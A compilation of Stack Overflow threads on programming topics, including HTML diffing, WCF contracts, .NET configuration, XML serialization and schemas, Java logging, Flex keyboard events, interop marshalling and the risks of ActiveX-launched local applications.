Q: Anyone have a diff algorithm for rendered HTML? I'm interested in seeing a good diff algorithm, possibly in Javascript, for rendering a side-by-side diff of two HTML pages. The idea would be that the diff would show the differences of the rendered HTML. To clarify, I want to be able to see the side-by-side diffs as rendered output. So if I delete a paragraph, the side by side view would know to space things correctly. @Josh exactly. Though maybe it would show the deleted text in red or something. The idea is that if I use a WYSIWYG editor for my HTML content, I don't want to have to switch to HTML to do diffs. I want to do it with two WYSIWYG editors side by side maybe. Or at least display diffs side-by-side in an end-user friendly matter. A: I ended up needing something similar awhile back. To get the HTML to line up side to side, you could use two iFrames, but you'd then have to tie their scrolling together via javascript as you scroll (if you allow scrolling). To see the diff, however, you will more than likely want to use someone else's library. I used DaisyDiff, a Java library, for a similar project where my client was happy with seeing a single HTML rendering of the content with MS Word "track changes"-like markup. HTH A: Consider using the output of links or lynx to render a text-only version of the html, and then diff that. A: What about DaisyDiff (Java and PHP vesions available). Following features are really nice: * *Works with badly formed HTML that can be found "in the wild". *The diffing is more specialized in HTML than XML tree differs. Changing part of a text node will not cause the entire node to be changed. *In addition to the default visual diff, HTML source can be diffed coherently. *Provides easy to understand descriptions of the changes. *The default GUI allows easy browsing of the modifications through keyboard shortcuts and links. A: There's another nice trick you can use to significantly improve the look of a rendered HTML diff. Although this doesn't fully solve the initial problem, it will make a significant difference in the appearance of your rendered HTML diffs. Side-by-side rendered HTML will make it very difficult for your diff to line up vertically. Vertical alignment is crucial for comparing side-by-side diffs. In order to improve the vertical alignment of a side-by-side diff, you can insert invisible HTML elements in each version of the diff at "checkpoints" where the diff should be vertically aligned. Then you can use a bit of client-side JavaScript to add vertical spacing around checkpoint until the sides line up vertically. Explained in a little more detail: If you want to use this technique, run your diff algorithm and insert a bunch of visibility:hidden <span>s or tiny <div>s wherever your side-by-side versions should match up, according to the diff. Then run JavaScript that finds each checkpoint (and its side-by-side neighbor) and adds vertical spacing to the checkpoint that is higher-up (shallower) on the page. Now your rendered HTML diff will be vertically aligned up to that checkpoint, and you can continue repairing vertical alignment down the rest of your side-by-side page. A: Over the weekend I posted a new project on codeplex that implements an HTML diff algorithm in C#. The original algorithm was written in Ruby. I understand you were looking for a JavaScript implementation, perhaps having one available in C# with source code could assist you to port the algorithm. Here is the link if you are interested: htmldiff.codeplex.com. You can read more about it here. UPDATE: This library has been moved to GitHub. A: So, you expect <font face="Arial">Hi Mom</font> and <span style="font-family:Arial;">Hi Mom</span> to be considered the same? The output depends very much on the User Agent. Like Ionut Anghelcovici suggests, make an image. Do one for every browser you care about. A: Use the markup mode of Pretty Diff for HTML. It is written entirely in JavaScript. http://prettydiff.com/ A: If it is XHTML (which assumes a lot on my part) would the Xml Diff Patch Toolkit help? http://msdn.microsoft.com/en-us/library/aa302294.aspx A: For smaller differences you might be able to do a normal text-diff, and then analyse the missing or inserted pieces to see how to resolve it, but for any larger differences you're going to have a very tough time doing this. For instance, how would you detect, and show, that a left-aligned image (floating left of a paragraph of text) has suddenly become right-aligned? A: Using a text differ will break on non-trivial documents. Depending on what you think is intuitive, XML differs will probably generate diffs that aren't very good for text with markup. AFAIK, DaisyDiff is the only library specialized in HTML. It works great for a subset of HTML. A: If you were working with Java and XHTML, XMLUnit allows you to compare two XML documents via the org.custommonkey.xmlunit.DetailedDiff class: Compares and describes all the differences between two XML documents. The document comparison does not stop once the first unrecoverable difference is found, unlike the Diff class. A: I believe a good way to do this is to render the HTML to an image and then use some diff tool that can compare images to spot the differences.
{ "language": "en", "url": "https://stackoverflow.com/questions/31722", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "90" }
Q: How many ServiceContracts can a WCF service have? How many ServiceContracts can a WCF service have? Specifically, since a ServiceContract is an attribute to an interface, how many interfaces can I code into one WCF web service? Is it a one-to-one? Does it make sense to separate the contracts across multiple web services? A: WCF services can have multiple endpoints, each of which can implement a different service contract. For example, you could have a service declared as follows: [ServiceBehavior(Namespace = "DemoService")] public class DemoService : IDemoService, IDoNothingService Which would have configuration along these lines: <service name="DemoService" behaviorConfiguration="Debugging"> <host> <baseAddresses> <add baseAddress = "http://localhost/DemoService.svc" /> </baseAddresses> </host> <endpoint address ="" binding="customBinding" bindingConfiguration="InsecureCustom" bindingNamespace="http://schemas.com/Demo" contract="IDemoService"/> <endpoint address ="" binding="customBinding" bindingConfiguration="InsecureCustom" bindingNamespace="http://schemas.com/Demo" contract="IDoNothingService"/> </service> Hope that helps, but if you were after the theoretical maximum interfaces you can have for a service I suspect it's some crazily large multiple of 2. A: You can have a service implement all the service contracts you want. I mean, I don't know if there is a limit, but I don't think there is. That's a neat way to separate operations that will be implemented by the same service in several conceptually different service contract interfaces. A: @jdiaz Of course you should strive to have very different business matters in different services, but consider the case in which you want that, for example, all your services implement a GetVersion() operation. You could have a service contract just for that operation and have every service implement it, instead of adding the GetVersion() operation to the contract of all your services. A: A service can theoretically have any number of Endpoints, and each Endpoint is bound to a particular contract, or interface, so it is possible for a single conceptual (and configured) service to host multiple interfaces via multiple endpoints or alternatively for several endpoints to host the same interface. If you are using the ServiceHost class to host your service, though, instead of IIS, you can only associate a single interface per ServiceHost. I'm not sure why this is the case, but it is.
{ "language": "en", "url": "https://stackoverflow.com/questions/31790", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Help accessing application settings using ConfigurationManager In .net frameworks 1.1, I use System.Configuration.ConfigurationSettings.AppSettings["name"]; for application settings. But in .Net 2.0, it says ConfigurationSettings is obsolete and to use ConfigurationManager instead. So I swapped it out with this: System.Configuration.ConfigurationManager.AppSettings["name"]; The problem is, ConfigurationManager was not found in the System.Configuration namespace. I've been banging my head against the wall trying to figure out what I'm doing wrong. Anybody got any ideas? A: You have to reference the System.configuration assembly (note the lowercase) I don't know why this assembly is not added by default to new projects on Visual Studio, but I find myself having the same problem every time I start a new project. I always forget to add the reference. A: If you're just trying to get a value from the app.config file, you might want to use: ConfigurationSettings.AppSettings["name"]; That works for me, anyways. /Jonas A: You are missing the reference to System.Configuration. A: Visual Studio doesn't make it obvious which assembly reference you need to add. One way to find out would be to look up ConfigurationManager in the MSDN Library. At the top of the "about ConfigurationManager class" page it tells you which assembly and DLL the class is in. A: System.Configuration us refer to System.configuration (not the small case for configuration, in .net 2.o it reefers to System.Configuration.dll.
{ "language": "en", "url": "https://stackoverflow.com/questions/31794", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: Preventing XML Serialization of IEnumerable and ICollection & Inherited Types NOTE: XMLIgnore is NOT the answer! OK, so following on from my question on XML Serialization and Inherited Types, I began integrating that code into my application I am working on, stupidly thinking all will go well.. I ran into problems with a couple of classes I have that implement IEnumerable and ICollection<T> The problem with these is that when the XMLSerializer comes to serialize these, it views them as an external property, and instead of using the property we would like it to (i.e. the one with our AbstractXmlSerializer ) it comes here and falls over (due to the type mismatch), pretty much putting us back to square one. You cannot decorate these methods with the XmlIgnore attribute either, so we cannot stop it that way. My current solution is to remove the interface implementation (in this current application, its no real big deal, just made the code prettier). Do I need to swallow my pride on this one and accept it cant be done? I know I have kinda pushed and got more out of the XmlSerializer than what was expected of it :) Edit I should also add, I am currently working in framework 2. Update I have accepted lomaxx's answer. In my scenario I cannot actually do this, but I do know it will work. Since their have been no other suggestions, I ended up removing the interface implementation from the code. A: you can get around this problem by getting hold of the System.RunTime.Serialization dll (it's a .net 3.x assembly) and referencing it from your .net 2.0 application. This works because the .net 3.0 binaries are compiled to run on the .net 2.0 CLR. By doing this, you get access to the DataContractSerliazer which I've used to get around a similar problem where I wanted to pass in a ICollection as a parameter to a webservice and the xmlserializer didn't know how to deal with it properly. If you're cool with using the .net 3.x dll in your 2.x application you should be able to use the DataContractSerializer to solve this problem A: i guess the answer is coming too late to be useful for your particular application, but maybe there are other people having the same problem. i suppose you can implement IXmlSerializable for the IEnumerable type to work around this behaviour. however, this means you have to fully control the serialization process for this type. a simple approach for not having to mess with the XmlReader / XmlWriter, you can write a helper xml adapter class with public ctor and public read-write-properties of all the data to be serialized, and create a temporary XmlSerializer object for this type inside IXmlSerializable.[Read|Write]Xml(). class Target : IEnumerable<Anything>, IXmlSerializable { //... public void ReadXml(System.Xml.XmlReader reader) { reader.ReadStartElement(); TargetXmlAdapter toRead = (TargetXmlAdapter)new XmlSerializer(typeof(TargetXmlAdapter)).Deserialize(reader); reader.Read(); // here: install state from TargetXmlAdapter } public void WriteXml(System.Xml.XmlWriter writer) { // NOTE: TargetXmlAdapter(Target) is supposed to store this' state being subject to serialization new XmlSerializer(typeof(TargetXmlAdapter)).Serialize(writer, new TargetXmlAdapter(this)); } } A: If you use these attributes: [XmlArray("ProviderPatientLists")] [XmlArrayItem("File")] public ProviderPatientList Files { get { return _ProviderPatientLists; } set { _ProviderPatientLists = value; } } Where ProviderPatientList inherit's List<PatientList> You can then have more control over the xml outputed will create
{ "language": "en", "url": "https://stackoverflow.com/questions/31799", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How to respond to an alternate URI in a RESTful web service I'm building a RESTful web service which has multiple URIs for one of its resources, because there is more than one unique identifier. Should the server respond to a GET request for an alternate URI by returning the resource, or should I send an HTTP 3xx redirect to the canonical URI? Is HTTP 303 (see also) the most appropriate redirect? Clarification: the HTTP specification makes it clear that the choice of redirect depends on which URI future requests should use. In my application, the 'canonical' URI is the most stable of the alternatives; an alternative URI will always direct to same canonical URI, or become invalid. A: I'd personally plump for returning the resource rather than faffing with a redirect, although I suspect that's only because my subcoscious is telling me redirects are slower. However, if you were to decide to use a redirect I'd think a 302 or 307 might be more appropiate than a 303, although the w3.org has details of the different redirect codes you could use. A: Under W3C's Architexture of the World Wide Web, Volume One, there is a section on URI aliases (Section 2.3.1) which states the following: "When a URI alias does become common currency, the URI owner should use protocol techniques such as server-side redirects to relate the two resources. The community benefits when the URI owner supports redirection of an aliased URI to the corresponding "official" URI. For more information on redirection, see section 10.3, Redirection, in RFC2616. See also CHIPS for a discussion of some best practices for server administrators." For what it's worth, I would recommend a 302 redirect. A: The answer from Ubiguchi had what I needed, except that I now think a redirect is the way to go, via the link to the HTTP 1.1 specifiction section on response codes. It turns out that I actually need a 301 redirect because the URI I'm redirecting to is more 'correct' and stable, and should therefore be used for future requests.
{ "language": "en", "url": "https://stackoverflow.com/questions/31800", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Performance issues regarding Access 2003 and the OLE Object data type In MS Access 2003 (I know, I know), I'm using the OLE Object data type to persist the sate of some objects that are marked as serializable (just using a IO.BinaryFormatter to serialize to a MemoryStream, and then saving that to the db as a Byte array). Does this work pretty much like a varbinary, or a blob? Are there any gotchas looming in the shadows that anyone knows about? Any performance advise or war stories? I'd profit from any advice. A: In access I never figured out how to properly use the OLE object data type without real performance problems (and structural too -- lots of compact and repair jobs). The solution path I've always taken (mind you I haven't used Access in anger now for years) is to just store the blogs onto disk somewhere and store the file location in the data table. A: I can't answer your specific question, but you might want to look at the GetChunk and AppendChunk methods in Access help, since those are the methods used for writing and manipulating data in binary fields.
{ "language": "en", "url": "https://stackoverflow.com/questions/31812", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: How to find out which Service Pack is installed on SQL Server? How can I find out which Service Pack is installed on my copy of SQL Server? A: Select @@Version Ex: My machine has the following one installed. Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Enterprise Edition on Windows NT 6.1 (Build 7601: Service Pack 1) A: From TechNet: Determining which version and edition of SQL Server Database Engine is running -- SQL Server 2000/2005 SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY ('productlevel'), SERVERPROPERTY ('edition') -- SQL Server 6.5/7.0 SELECT @@VERSION
{ "language": "en", "url": "https://stackoverflow.com/questions/31818", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: Algorithmic complexity of XML parsers/validators I need to know how the performance of different XML tools (parsers, validators, XPath expression evaluators, etc) is affected by the size and complexity of the input document. Are there resources out there that document how CPU time and memory usage are affected by... well, what? Document size in bytes? Number of nodes? And is the relationship linear, polynomial, or worse? Update In an article in IEEE Computer Magazine, vol 41 nr 9, sept 2008, the authors survey four popular XML parsing models (DOM, SAX, StAX and VTD). They run some very basic performance tests which show that a DOM-parser will have its throughput halved when the input file's size is increased from 1-15 KB to 1-15 MB, or about 1000x larger. The throughput of the other models is not significantly affected. Unfortunately they did not perform more detailed studies, such as of throughput/memory usage as a function of number of nodes/size. The article is here. Update I was unable to find any formal treatment of this problem. For what it's worth, I have done some experiments measuring the number of nodes in an XML document as a function of the document's size in bytes. I'm working on a warehouse management system and the XML documents are typical warehouse documents, e.g. advanced shipping notice etc. The graph below shows the relationship between the size in bytes and the number of nodes (which should be proportional to the document's memory footprint under a DOM model). The different colors correspond to different kinds of documents. The scale is log/log. The black line is the best fit to the blue points. It's interesting to note that for all kinds of documents, the relationship between byte size and node size is linear, but that the coefficient of proportionality can be very different. (source: flickr.com) A: If I was faced with that problem and couldn't find anything on google I would probably try to do it my self. Some "back-of-an-evelope" stuff to get a feel for where it is going. But it would kinda need me to have an idea of how to do a xml parser. For non algorithmical benchmarks take a look here: * *http://www.xml.com/pub/a/Benchmark/exec.html *http://www.devx.com/xml/Article/16922 *http://xerces.apache.org/xerces2-j/faq-performance.html A: I think there are too many variables involved to come up with a simple complexity metric unless you make a lot of assumptions. A simple SAX style parser should be linear in terms of document size and flat for memory. Something like XPath would be impossible to describe in terms of just the input document since the complexity of the XPath expression plays a huge role. Likewise for schema validation, a large but simple schema may well be linear, whereas a smaller schema that has a much more complex structure would show worse runtime performance. As with most performance questions the only way to get accurate answers is to measure it and see what happens! A: Rob Walker is right: the problem isn't specified in enough detail. Considering just parsers (and ignoring the question of whether they perform validation), there are two main flavors: tree-based—think DOM—and streaming/event-based—think SAX (push) and StAX (pull). Speaking in huge generalities, the tree-based approaches consume more memory and are slower (because you need to finish parsing the whole document), while the streaming/event-based approaches consume less memory and are faster. Tree-based parsers are generally considered easier to use, although StAX has been heralded as a huge improvement (in ease-of-use) over SAX. A: I was planning to load extremely large XML files in my application. I asked the question here on Stack Overflow: Fastest Possible XML handling for very large documents. And yes, it was the parsing part, that was the bottleneck. I ended up not using XML parsers at all. Instead, I parsed characters one by one as efficiently as possible optimizing for speed. This resulted in speeds of 40 MB per second on a 3 GHz Windows PC for the reading, parsing and loading of the internal data structure. I would be very interested in hearing how the various XML parsing modes compare to this.
{ "language": "en", "url": "https://stackoverflow.com/questions/31826", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: Generating random terrain in Blender3D I tried finding a python script in google that will generate a random terrain when the game starts (or each time a the player advances to a new scene) but all the tools I found are for creating a terrain to render it, not for the game mode. Any idea how/where to find one? (I'm assuming that since Blender3D has game programming capabilities, it is OK for someone to ask in SO) A: Is this link related? http://blenderartists.org/forum/showthread.php?t=77794 To generate terrain (height map) the algorithm is pretty simple (fractal plasma), something like this algorithm (Java): http://www.sinc.stonybrook.edu/stu/jseyster/plasma/ If you Google search for "fractal plasma python" you might find some example code. A: I've not really worked much with the game engine, but how about generating a random cloud texture and using that to displace the model? Wouldn't that be easier? A: You should be able to reprogram most of the python scripts available to generate terrain for rendering to generate terrain for your game... is there a specific thing you need from the script to make it suitable for realtime gameplay instead of a static render? A: Simplest way to achieve this is to cheat a little. Instead of actually generating random terrain make a random cloud texture (not sure how to do that with phyton) and then make the displace modifier use that texture and that's it! I'm not sure how easier it could be.
{ "language": "en", "url": "https://stackoverflow.com/questions/31834", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Java Logging vs Log4J Is it still worth to add the log4j library to a Java 5 project just to log let's say some exceptions to a file with some nice rollover settings. Or will the standard util.logging facility do the job as well? What do you think? A: log4j is a much nicer package overall, and doesn't have some of the hiccups that java.util.logging contains. I'd second that using log4j directly is easier than using the commons logging. A: I recommend that you use the Simple Logging Facade for Java (SLF4J). It supports different providers that include Log4J and can be used as a replacement for Apache Commons Logging. A: I recommend using Apache Commmons Logging as your logging interface. That way you have the flexibility to switch logging implementations anytime you want without requiring any code changes on your end. A: I would go with log4j. The possibilites with log4j is not obsolete at all! A: Log4j has been around for a long time, and it works very well. I have no scientific study to back it, but based on what I've seen at a large number of clients, it is easily the logging framework that I see used more than any other. It has been around for a long time, and not been replaced by the Next Big Logging Framework, which says something. It is dead simple to set up, and easy to learn the basic appenders (outputs). There are a whole host appenders that are available, including: * *ConsoleAppender *DailyRollingFileAppender *ExternallyRolledFileAppender *FileAppender *JDBCAppender *JMSAppender *NTEventLogAppender *RollingFileAppender *SMTPAppender *SocketAppender *SyslogAppender *TelnetAppender *WriterAppender Plus others. It isn't difficult to write your own appender either. Additionally there is a great deal of flexibility in each of the appenders that allow you to control specifically what is output in your log. One note, I had a series of classloader problems when I used apache commons logging in addition to log4j. It was only for one specific application, but I found it simpler to use log4j alone, rather than to have the flexibility offered when using an abstraction layer like commons logging. See this article for more details: Good luck! A: java.util.logging offers a comprehensive logging package without the excess baggage some of the others provide.. A: I'd say you're probably fine with util.logging for the needs you describe. For a good decision tree, have a look at Log4j vs java.util.logging Question One : Do you anticipate a need for any of the clever handlers that Log4j has that JUL does not have, such as the SMTPHandler, NTEventLogHandler, or any of the very convenient FileHandlers? Question Two : Do you see yourself wanting to frequently switch the format of your logging output? Will you need an easy, flexible way to do so? In other words, do you need Log4j's PatternLayout? Question Three : Do you anticipate a definite need for the ability to change complex logging configurations in your applications, after they are compiled and deployed in a production environment? Does your configuration sound something like, "Severe messages from this class get sent via e-mail to the support guy; severe messages from a subset of classes get logged to a syslog deamon on our server; warning messages from another subset of classes get logged to a file on network drive A; and then all messages from everywhere get logged to a file on network drive B"? And do you see yourself tweaking it every couple of days? If you can answer yes to any of the above questions, go with Log4j. If you answer a definite no to all of them, JUL will be more than adequate and it's conveniently already included in the SDK. That said, pretty much every project these days seems to wind up including log4j, if only because some other library uses it.
{ "language": "en", "url": "https://stackoverflow.com/questions/31840", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "149" }
Q: XML Schema construct for "Any number of these elements - in any order" I need to create an XML schema that looks something like this: <xs:element name="wrapperElement"> <xs:complexType> <xs:sequence> <xs:element type="el1"> <xs:element type="el2"> </xs:sequence> <xs:WhatGoesHere?> <xs:element type="el3"> <xs:element type="el4"> <xs:element type="el5"> </xs:WhatGoesHere?> <xs:sequence> <xs:element type="el6"> <xs:element type="el7"> </xs:sequence> </xs:complexType> </xs:element> What I need is a replacement for "WhatGoesHere" such that any number of el3, el4 and el5 can appear in any order. For instance it could contain {el3, el3, el5, el3} Any idea on how to solve this? A: You want xs:choice with occurrence constraints: <xs:element name="wrapperElement"> <xs:complexType> <xs:sequence> <xs:element name="e11"/> <xs:element name="el2"/> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="el3"/> <xs:element name="el4"/> <xs:element name="el5"/> </xs:choice> <xs:element name="el6"/> <xs:element name="el7"/> </xs:sequence> </xs:complexType> </xs:element>
{ "language": "en", "url": "https://stackoverflow.com/questions/31847", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: Capturing Cmd-C (or Ctrl-C) keyboard event from modular Flex application in browser or AIR It seems that it is impossible to capture the keyboard event normally used for copy when running a Flex application in the browser or as an AIR app, presumably because the browser or OS is intercepting it first. Is there a way to tell the browser or OS to let the event through? For example, on an AdvancedDataGrid I have set the keyUp event to handleCaseListKeyUp(event), which calls the following function: private function handleCaseListKeyUp(event:KeyboardEvent):void { var char:String = String.fromCharCode(event.charCode).toUpperCase(); if (event.ctrlKey && char == "C") { trace("Ctrl-C"); copyCasesToClipboard(); return; } if (!event.ctrlKey && char == "C") { trace("C"); copyCasesToClipboard(); return; } // Didn't match event to capture, just drop out. trace("charCode: " + event.charCode); trace("char: " + char); trace("keyCode: " + event.keyCode); trace("ctrlKey: " + event.ctrlKey); trace("altKey: " + event.altKey); trace("shiftKey: " + event.shiftKey); } When run, I can never get the release of the "C" key while also pressing the command key (which shows up as KeyboardEvent.ctrlKey). I get the following trace results: charCode: 0 char: keyCode: 17 ctrlKey: false altKey: false shiftKey: false As you can see, the only event I can capture is the release of the command key, the release of the "C" key while holding the command key isn't even sent. Has anyone successfully implemented standard copy and paste keyboard handling? Am I destined to just use the "C" key on it's own (as shown in the code example) or make a copy button available? Or do I need to create the listener manually at a higher level and pass the event down into my modular application's guts? A: I did a test where I listened for key up events on the stage and noticed that (on my Mac) I could capture control-c, control-v, etc. just fine, but anything involving command (the  key) wasn't captured until I released the command key, and then ctrlKey was false (even though the docs says that ctrlKey should be true for the command key on the Mac), and the charCode was 0. Pretty useless, in short. A: Another incredibly annoying thing that I just realized is that ctrl-c can't be captured by event.ctrlKey && event.keyCode = Keyboard.C (or ...event.charCode == 67), instead you have to test for charCode or keyCode being 3. It kind of makes sense for charCode since ctrl-c is 3 in the ASCII table, but it doesn't make sense for keyCode, which is supposed to represent the key on the keyboard, not the typed character. The same goes for all other key combos (because every ctrl combo has an ASCII equivalent). Edit Found a bug in the Flex bug system about this: https://bugs.adobe.com/jira/browse/FP-375 A: For me, the following works: private var _ctrlHoldFlag:Boolean = false; // Do something if CTRL was held down and C was pressed // Otherwise release the ctrl flag if it was pressed public function onKey_Up(event:KeyboardEvent):void { var keycode_c:uint = 67; if (_ctrlHoldFlag && event.keyCode == keycode_c) { //do whatever you need on CTRL-C } if (event.ctrlKey) { _ctrlHoldFlag = false; } } // Track ctrl key down press public function onKey_Down(event:KeyboardEvent):void { if (event.ctrlKey) { _ctrlHoldFlag = true; } } A: I've found one workaround to this one based on the capture sequence. When you press Cmd+A, for example, the sequence is: * *type: KEY_DOWN, keyCode 15 *type: KEY_UP, keyCode 15 *type: KEY_DOWN, keyCode 65 So everytime you get keyCode 15 down and then up and the next capture is down you can assume that the user pressed the key combination. My implementation end up like this: protected var lastKeys:Array; this.stage.addEventListener(KeyboardEvent.KEY_DOWN, keyHandler, false, 0, true); this.stage.addEventListener(KeyboardEvent.KEY_UP, keyHandler, false, 0, true); private function getCmdKey(ev:KeyboardEvent):Boolean { this.lastKeys.push(ev); this.lastKeys = this.lastKeys.splice(Math.max(0, this.lastKeys.length-3), 3); if (this.lastKeys.length < 3) return false; if (ev.keyCode != 15 && ev.type == KeyboardEvent.KEY_UP) { var firstKey:KeyboardEvent = this.lastKeys[0] as KeyboardEvent; var secondKey:KeyboardEvent = this.lastKeys[1] as KeyboardEvent; if (firstKey.keyCode == 15 && firstKey.type == KeyboardEvent.KEY_DOWN && secondKey.keyCode == 15 && secondKey.type == KeyboardEvent.KEY_UP) { return true; } } return false; } private function keyHandler(ev:KeyboardEvent):void { var cmdKey:Boolean = this.getCmdKey(ev.clone() as KeyboardEvent); var ctrlKey:Boolean = ev.ctrlKey || cmdKey; if (ctrlKey) { if (ev.keyCode == 65) { // ctrl + "a"-- select all! } } }
{ "language": "en", "url": "https://stackoverflow.com/questions/31849", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: How to marshal an array of structs - (.Net/C# => C++) Disclaimer: Near zero with marshalling concepts.. I have a struct B that contains a string + an array of structs C. I need to send this across the giant interop chasm to a COM - C++ consumer. What are the right set of attributes I need to decorate my struct definition ? [ComVisible (true)] [StructLayout(LayoutKind.Sequential)] public struct A { public string strA public B b; } [ComVisible (true)] [StructLayout(LayoutKind.Sequential)] public struct B { public int Count; [MarshalAs(UnmanagedType.LPArray, ArraySubType=UnmanagedType.Struct, SizeParamIndex=0)] public C [] c; } [ComVisible (true)] [StructLayout(LayoutKind.Sequential)] public struct C { public string strVar; } edit: @Andrew Basically this is my friends' problem. He has this thing working in .Net - He does some automagic to have the .tlb/.tlh created that he can then use in the C++ realm. Trouble is he can't fix the array size. A: C++: The Most Powerful Language for .NET Framework Programming I was about to approach a project that needed to marshal structured data across the C++/C# boundary, but I found what could be a better way (especially if you know C++ and like learning new programming languages). If you have access to Visual Studio 2005 or above you might consider using C++/CLI rather than marshaling. It basically allows you to create this magic hybrid .NET/native class library that's 100% compatible with C# (as if you had written everything in C#, for the purposes of consuming it in another C# project) that is also 100% compatible with C and/or C++. In your case you could write a C++/CLI wrapper that marshaled the data from C++ in memory to CLI in memory types. I've had pretty good luck with this, using pure C++ code to read and write out datafiles (this could be a third party library of some kind, even), and then my C++/CLI code converts (copies) the C++ data into .NET types, in memory, which can be consumed directly as if I had written the read/write library in C#. For me the only barrier was syntax, since you have to learn the CLI extensions to C++. I wish I'd had StackOverflow to ask syntax questions, back when I was learning this! In return for trudging through the syntax, you learn probably the most powerful programming language imaginable. Think about it: the elegance and sanity of C# and the .NET libraries, and the low level and native library compatibility of C++. You wouldn't want to write all your projects in C++/CLI but it's great for getting C++ data into C#/.NET projects. It "just works." Tutorial: * *http://www.codeproject.com/KB/mcpp/cppcliintro01.aspx A: The answer depends on what the native definitions are that you are trying to marshal too. You haven't provided enough information for anyone to be able to really help. A common thing that trips people up when marshalling strings in native arrays is that native arrays often use a fixed-size buffer for the string that is allocated inline with the struct. Your definition is marshalling the strings as a pointer to another block of memory containing the string (which is the default). [MarshalAs(UnmanagedType.ByValTStr, SizeConst = ##)] might be what you are looking for...
{ "language": "en", "url": "https://stackoverflow.com/questions/31854", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Good reasons for not letting the browser launch local applications I know this might be a no-brainer, but please read on. I also know it's generally not considered a good idea, maybe the worst, to let a browser run and interact with local apps, even in an intranet context. We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion. These folks are not particularly tech savvy; I don't even consider thinking that they could understand the difference between remote delivered applications and local ones. So, I've been asked if it's possible. Of course, it is, with IE's good ol' ActiveX controls. And I even made a working prototype (that's where it hurts). But now, I doubt. Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web, can I fully trust IE? Isn't there a risk that Microsoft would just disable those controls in future updates/versions? What if a website, or any kind of malware, just put another site on the trust list? With that extent of control, you could as well uninstall every protection and just run amok 'till you got hanged by the IT dept. I'm about to confront my superiors with the fact that, even if they saw it is doable, it would be a very bad thing. So I'm desperately in need of good and strong arguments, because "let's don't" won't do it. Of course, if there is nothing to be scared of, that'll be nice too. But I strongly doubt that. A: We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion I haven't used Citrix very many times, but what's it got to do with executing local applications? I don't see how "People like Citrix" and "browser executing local applications" relate at all? If the people are accessing your Citrix server from home, and want the same experience in the office, then buy a cheap PC, and run the exact same Citrix software they run on their home computers. Put this computer in the corner and tell them to go use it. They'll be overjoyed. Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone ? People will use the same browser to surf the web, can I fully trust IE ? Put it this way. IE has built-in support for AX controls. It uses it's security mechanisms to prevent them from running unless in a trusted site. By default, no sites are trusted at all. If you use IE at all then you're putting yourself at the mercy of these security mechanisms. Whether or not you tell it to trust the local intranet is beside the point, and isn't going to affect the operation of any other zones. The good old security holes that require you to reboot your computer every few weeks when MS issues a patch will continue to exist and cause problems, regardless of whether you allow ActiveX in your local intranet. Isn't there a risk that Microsoft would just disable those controls in future updates / versions ? Since XP-SP2, Microsoft has been making it increasingly difficult to use ActiveX controls. I don't know how many scary looking warning messages and "This might destroy your computer" dialogs you have to click through these days to get them to run, but it's quite a few. This will only get worse over time. A: Microsoft is walking a fine line. On one hand, they regularly send ActiveX killbits with Windows Update to remove/disable applications that have been misbehaving. On the other hand, the latest version of Sharepoint 2007 (can't speak for earlier versions) allows for Office documents to be opened by clicking a link in the browser, and edited in the local application. When the edit is finished, the changes are transmitted back to the server and the webpage (generally) is refreshed. This is only an IE thing, as Firefox will throw up an error message. I can see the logic behind it, though. Until Microsoft gets all of their apps 'in the cloud', there are cases that need to bridge the gap between the old client-side apps and a more web-centric business environment. While there is likely a non-web workaround, more and more information workers have come to expect that a large portion of their work will be done in a browser. Anything that makes the integration with the desktop easier is not going to be opposed by anyone except the sysadmins. A: The standard citrix homepage (or how we use it) is a simple web page with program icons. Click on it, and the application get's delivered to you. People want the same thing, at work, with their applications/folders/documents. And because I'm a web developer, and they asked me, I do it with a web page... Perhaps I should pass the whole thing over to the VB guy.. Ahh... I know of 2 ways to accomplish this: You can embed internet explorer into an application, and hook into it and intercept certain kinds of URL's and so on I saw this done a few years ago - a telephony application embedded internet explorer in itself, and loaded some specially formatted webpages. In the webpage there was this: <a href="dial#1800-234-567">Call John Smith</a> Normally this would be a broken URL, but when the user clicked on this link, the application containing the embedded IE got notified, and proceeded to execute it's own custom code to dial the number from the URL. You could get your VB guy to write an application which basically just wraps IE, and has handlers for executing applications. You could then code normal webpages with links to just open applications, and the VB app would launch them. This allows you to write your own security stuff (like, only launch applications in a preset list, or so on) into the VB app, and because VB is launching them, not IE, none of the IE security issues will be involved. The second way is with browser plug-ins. For example, skype comes with a Firefox plug-in, which looks for phone-numbers in web-pages, and attaches special links to them. When you click on these links it invokes skype - you could conceivably do something similar for launching your citrix apps. You'd then be tied to firefox though. Writing plugins for IE is much harder than for FF, I wouldn't go down that path unless forced to.
{ "language": "en", "url": "https://stackoverflow.com/questions/31865", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
